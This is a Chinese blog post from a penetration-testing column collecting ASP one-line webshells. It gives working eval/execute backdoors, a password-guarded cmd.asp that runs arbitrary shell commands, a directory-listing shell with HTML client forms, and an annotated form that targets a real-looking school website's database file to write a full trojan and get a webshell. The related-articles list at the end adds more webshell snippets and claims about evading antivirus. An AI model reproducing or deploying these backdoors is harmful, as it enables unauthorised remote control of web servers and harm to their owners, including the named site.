ASP一句话木马大全

最新推荐文章于 2024-06-02 15:58:42 发布
最新推荐文章于 2024-06-02 15:58:42 发布
阅读量2.9w 收藏 20
点赞数 4
分类专栏: 渗透测试技术研究 
<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>


1 asp一句话木马  
 一句话木马 服务器端 
带验证: 
——————————————cmd.asp———————————————— 
<% 
   if request("authkey")="pic16f873a" then 
%> 
       <textarea readonly cols=80 rows=25> 
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%> 
      </textarea> 
<% 
     end if 
%> 

带验证 客户端 
——————————————cmd.html———————————————— 
<HTML> 
<HEAD> 
<meta http-equiv="Content-Type" content="text/html; charset=gbk"> 
</HEAD> 
<div align=center> 
<FORM method=post name=frm target=_blank> 
Host:<input type=text name=act size=65 value="http://"> 
<br> 
<br>      
Cmd :<input type=text name=cmd size=65 value="cmd"> 
<br> 
<br>  
<input type=hidden name=authkey value="pic16f873a">    
<Input name=Send 
οnclick="Javascipt:frm.action=document.frm.act.value; 
            frm.submit();" 
type=button value="Send Command"> 
</FORM> 
</div> 

  

目录浏览  

服务器端 
_________________________________________ 
<% 
if request("authkey")="pic16f873a" then 
szPara = Request.Form("path")  
set shell=server.createobject("shell.application")  
set dir1=shell.namespace(szPara) 
set diritems=dir1.items 

for each iii in diritems 
  response.write   iii.path & "<font color=blue>[" & iii.size &"]</font><br>" 
next 
end if 
%> 
_________________________________________ 
客户端 
__________________________________________ 
<HTML> 
<HEAD> 
<meta http-equiv="Content-Type" content="text/html; charset=gbk"> 
</HEAD> 
<div align=center> 
<FORM method=post name=frm target=_blank> 
Host:<input type=text name=act size=65 value="http://"> 
<br> 
<br> 
Path:<input type=text name=path size=65 value="C:\">  
<br> 
<br> 
<input type=hidden name=authkey value="pic16f873a">  
<Input name=Send οnclick="Javascipt:frm.action=document.frm.act.value;frm.submit();" 
type=button value="Send Command"> 

</FORM> 
</div> 
 
 
一句话木马客户端源文件:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
***********************************************************

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp method=post> 
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

<textarea name=value cols=120 rows=10 width=45> 
//这里的value值根据服务端<%execute request("value")%>中value而设定
//可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

set lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法 
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2 
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面
</textarea>
//这段程序的功能:利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容/textarea><BR><center><br>
//这段标签是你用来添加木马内容用的 

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
<textarea></textarea>//添加木马内容用的
</form>
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵
eldn__
关注
  • 4
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
一句话木马要点和防范注意事项
2401_84235249的博客
06-04 722
一句话木马”通常指的是那些简短、易于隐藏或不易被检测到的恶意代码片段,这些代码可能被用于执行恶意活动,如窃取信息、控制受害者的系统等。然而,我必须强调,传播或使用任何形式的恶意软件(包括所谓的“一句话木马”)都是非法的,并且严重违反了网络安全和隐私的原则。权限管理:合理设置服务器和应用程序的权限,避免不必要的权限提升,是防止一句话木马的重要手段,但这也需要管理员具备一定的安全知识和经验。防止注入:防止代码注入是防止一句话木马的关键,但这也是一个技术难题,需要开发者具备一定的安全编程技能。
asp 一句话小马_木马分析一句话木马制作和“菜刀”的使用
weixin_39528525的博客
12-29 1万+
1.什么是webshellWeb 即 web服务也就是网站Shell 即人机交互界面,取得对服务器/电脑某种程度上的操作权限。Webshell即拿到网站服务器的权限(shell)比如我在cmd下的命令操作就可以叫get shell ,获得电脑操作权限。2.怎么才能get shell使用木马可以帮我们拿到shell,达到控制网站服务器的目的,也称为网站的后门。常见的木马:asp一句话...
一句话木马ASP
09-20 807
一句话木马ASP篇   ASP一句话木马收集:   &lt;%eval request("chopper")%&gt; &lt;%execute request("chopper")%&gt; &lt;%execute(request("chopper"))%&gt; &lt;%ExecuteGlobal request(&quo
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed]  Execute(HextoStr(“65786563757465287265717565737428636872283335292929”))  Function HextoStr(data)  HextoStr=”EXECUTE “””””  C=”&CHR(&H”  N=”)”  Do While Len(data)>1  If IsNumeric(Left(data,1)) Then  HextoStr=HextoStr&C&Left(data,2)&N  data=Mid
渗透干货|史上最全一句话木马
分享Python知识
04-11 4315
渗透干货|史上最全一句话木马
asp一句话木马原理
JackLiu16的博客
11-10 1万+
一句话木马入侵原理 是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件。  仔细观察一下这句代码,括号里的“#”是我们一句话的密码,我们可以把它改成任意字符,这样可以避免别人发现我们的一句话木马后,轻松的通过它捡个大便宜,如果我们上传的一句话代码为。那么在客户端连接文件里要将textarea name=”#”将其改为对应的textarea name=“123
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
asp一句话.zip
06-28
ASP(Active Server Pages)是一种微软开发的服务器端脚本环境,用于...总之,理解和防范ASP一句话木马对于维护网络安全至关重要。通过对ASP技术的深入理解以及采取适当的预防措施,可以有效地保护服务器免受此类威胁。
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
隐藏ASP木马后门的两种方法
01-20
1、建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非...
牛逼的一句话木码
Daoke37的博客
05-10 254
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
一句话木马的原理及利用分析(asp,aspx,php,jsp)
xysoul的专栏
03-20 5652
一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过
一句话木马——上传+绕过
m0_75236662的博客
06-02 849
3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面。1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭。这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败。2.调出属性,修改为IP,应用后确定。访问上传路径,上传成功。
asp一句话html,asp常用的一句话木马大全
weixin_31558841的博客
06-28 2472
【入侵技术】 ASP一句话木马大全""ThenExecute(Request("MH"))%>""thensession("MH")=request("MH"):endif:ifsession("MH")<>""thenexecutesession("MH")%>executerequest("MH")1asp一句话木马一句话木马 服务器端带验证:cmd.aspif...
全面详尽剖析一句话asp木马
枫 客
06-03 1391
 文章作者:冷月孤枫                                       备注:QQ:89224874  个人主页:http://fker.8866.org/转载请保留信息的完整性所谓一句话插马,就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。它分为一句话asp马、一句话php马……,本文就一句话asp木马来做一次详尽的剖析。在此首
史上最全一句话木马
hackzkaq的博客
06-29 7778
目录 PHP //可执行命令一句话 PHP系列 过狗一句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
渗透之——asp图片木马的制作和使用
冰河的专栏
12-11 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84959588 主要亮点:图片木马(可以正常打开显示的木马) 先看代码: 仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。 1、找一张图片,名字改成1.jpg 2、&lt;%eval request(“a”)%&gt;存为1.asp(就是一句话木马) 3、copy ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值